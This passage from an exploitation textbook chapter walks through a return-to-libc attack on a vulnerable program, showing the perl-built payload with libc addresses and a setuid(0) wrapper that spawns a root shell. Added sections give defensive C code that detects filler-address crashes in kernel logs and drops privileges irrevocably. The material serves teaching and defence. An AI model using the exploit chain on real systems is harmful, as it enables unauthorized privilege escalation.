Why was this? The program crashed when we left the user-level shell because the filler we supplied (0x42424242) became the saved eip, that is, the return address executed once the system() function returned. So a crash was the expected behavior when the program ended. To avoid that crash, we will simply supply the pointer to the exit() function in that filler location.
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 . "\xe0\x86\xed\xb7","\xa0\xe3\xec\xb7","\xc7\x04\xfc\xb7"'`
sh-3.1$ id
uid=1001(joe) gid=100(users) groups=100(users)
sh-3.1$ exit
exit
BT book $
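From the defender's side, the crash described above is an artifact worth looking for: a fault whose instruction pointer is a repeated-byte fill value such as 0x42424242 is the kernel telling you that a saved return address was overwritten. The following is an added example, not code from the book, that parses kernel segfault messages in their usual Linux x86 form ("comm[pid]: segfault at ADDR ip IP sp SP error ERR") and flags such crashes; the log lines it scans are constructed for the example, not real log data.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not from the book. Parses kernel segfault log lines and
 * flags faults whose instruction pointer is a repeated-byte fill value,
 * the signature of a return address overwritten by padding. The message
 * format assumed is the Linux x86 one:
 *   "comm[pid]: segfault at ADDR ip IP sp SP error ERR"            */

struct segfault_event {
    char comm[32];
    int pid;
    unsigned long addr, ip, sp, err;
};

/* True for a 32-bit value made of one repeated non-zero byte, e.g. 0x42424242. */
int is_filler_pattern(unsigned long v)
{
    unsigned long b = v & 0xffUL;
    if (b == 0)
        return 0;
    return (v & 0xffffffffUL) == b * 0x01010101UL;
}

/* Parse one log line. Returns 1 and fills *ev on a segfault message, else 0.
 * A leading "[ timestamp]" prefix, as dmesg prints it, is tolerated. */
int parse_segfault_line(const char *line, struct segfault_event *ev)
{
    const char *s = strstr(line, "]: segfault at ");
    if (s == NULL)
        return 0;
    if (sscanf(s, "]: segfault at %lx ip %lx sp %lx error %lx",
               &ev->addr, &ev->ip, &ev->sp, &ev->err) != 4)
        return 0;

    /* Walk back from the ']' to recover "comm[pid]". */
    const char *lb = s;
    while (lb > line && *lb != '[')
        lb--;
    if (*lb != '[')
        return 0;
    ev->pid = atoi(lb + 1);

    const char *start = lb;
    while (start > line && start[-1] != ' ')
        start--;
    size_t n = (size_t)(lb - start);
    if (n >= sizeof ev->comm)
        n = sizeof ev->comm - 1;
    memcpy(ev->comm, start, n);
    ev->comm[n] = '\0';
    return 1;
}

/* Count lines whose faulting ip looks like overwritten-return-address filler. */
int count_filler_crashes(const char *const *lines, int nlines)
{
    int hits = 0;
    struct segfault_event ev;
    for (int i = 0; i < nlines; i++) {
        if (parse_segfault_line(lines[i], &ev) && is_filler_pattern(ev.ip)) {
            printf("suspicious: %s[%d] ip=%08lx sp=%08lx\n",
                   ev.comm, ev.pid, ev.ip, ev.sp);
            hits++;
        }
    }
    return hits;
}

/* Constructed sample lines in the kernel message format; not real log data. */
static const char *const SAMPLE_LOG[] = {
    "[  812.101] vuln2[2714]: segfault at 42424242 ip 42424242 sp bffff7c0 error 4",
    "[  813.555] someapp[3001]: segfault at 0 ip b7ed86e0 sp bfc31234 error 4",
    "[  814.000] usb 1-1: new high-speed USB device number 3 using ehci_hcd",
};
#define SAMPLE_LOG_LEN 3

int scan_sample_log(void)
{
    return count_filler_crashes(SAMPLE_LOG, SAMPLE_LOG_LEN);
}

int main(void)
{
    printf("%d suspicious crash(es)\n", scan_sample_log());
    return 0;
}
```

Only the first sample line is flagged: its ip is the fill byte repeated, while the second line faults at a normal library address. Feeding the output of dmesg or the kernel log file through count_filler_crashes() gives a cheap first-pass indicator of overflow attempts against local binaries.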
As for the lack of root privilege, the system() function drops privileges when it calls a program. To get around this, we need a wrapper program that contains the system() call. We then call the wrapper with the execl() function, which does not drop privileges. The wrapper will look like this:
BT book $ cat wrapper.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(){
    setuid(0);          /* regain root before the shell is spawned */
    setgid(0);
    system("/bin/sh");
    return 0;
}
BT book $ gcc -o wrapper wrapper.c
Chapter 8: Advanced Linux Exploits
189
PART III
Notice that we do not need the wrapper program to be SUID. Now we need to call the
wrapper with the execl() function like this:
execl("./wrapper", "./wrapper", NULL);
You may now see that we have another issue to work through.
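The wrapper's setuid(0) only works because the vulnerable SUID program never gave up its saved uid of 0. The mitigation a practitioner wants here is the opposite discipline in the privileged program itself: drop real, effective and saved ids before calling system() or exec()ing anything, and verify that the drop cannot be undone. The following is an added example, not code from the book, assuming Linux with the glibc setresuid() family; run unprivileged it is a no-op that still passes its own check.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <grp.h>

/* Added example, not from the book: what a SUID program should do before it
 * ever calls system() or exec()s anything, so that a later setuid(0) in a
 * spawned program has no saved uid to climb back to. Linux/glibc assumed. */

/* Prototypes restated to match glibc's <unistd.h>/<grp.h>, so the example
 * compiles even when feature-test macros were fixed by an earlier include. */
int setresuid(uid_t, uid_t, uid_t);
int setresgid(gid_t, gid_t, gid_t);
int getresuid(uid_t *, uid_t *, uid_t *);
int getresgid(gid_t *, gid_t *, gid_t *);
int setgroups(size_t, const gid_t *);

/* Drop real, effective and saved ids to the invoking user's.
 * Returns 0 on success, -1 on failure. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Supplementary groups first: only possible while still effective root. */
    if (geteuid() == 0 && setgroups(1, &rgid) != 0)
        return -1;
    /* Group before user: once the uid is unprivileged, setresgid would fail. */
    if (setresgid(rgid, rgid, rgid) != 0)
        return -1;
    if (setresuid(ruid, ruid, ruid) != 0)
        return -1;
    return 0;
}

/* Return 1 if real, effective and saved ids all agree and, for a non-root
 * caller, an attempt to become root now fails; i.e. the drop is irrevocable. */
int privileges_irrevocable(void)
{
    uid_t r, e, s;
    gid_t rg, eg, sg;
    if (getresuid(&r, &e, &s) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return 0;
    if (r != e || e != s || rg != eg || eg != sg)
        return 0;
    if (r != 0 && setuid(0) == 0)
        return 0;   /* must not succeed after a correct drop */
    return 1;
}

int main(void)
{
    if (drop_privileges_permanently() != 0) {
        perror("drop_privileges_permanently");
        return 1;
    }
    printf("uid=%u euid=%u irrevocable=%d\n",
           (unsigned)getuid(), (unsigned)geteuid(), privileges_irrevocable());
    return 0;
}
```

Had vuln2 called drop_privileges_permanently() before the overflow, the wrapper's setuid(0) would fail with EPERM, because an unprivileged process may only switch to its real or saved uid, and both are now the invoking user. Note the ordering: groups, then gid, then uid; reversing it leaves the group ids elevated because the unprivileged uid can no longer change them.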